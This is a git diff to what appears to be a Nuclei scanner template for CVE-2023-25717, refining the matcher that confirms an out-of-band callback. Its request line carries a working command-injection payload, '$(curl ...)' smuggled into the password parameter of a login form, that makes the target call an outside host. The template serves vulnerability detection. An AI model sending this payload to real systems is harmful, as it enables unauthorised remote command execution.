diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml
index f7108f5bd9..588cfc489b 100644
--- a/http/cves/2023/CVE-2023-25717.yaml
+++ b/http/cves/2023/CVE-2023-25717.yaml
@@ -29,7 +29,8 @@ http:
       - "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
 
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, 'http')
+          - contains_all(to_lower(interactsh_request), 'user-agent','curl')
+        condition: and
\ No newline at end of file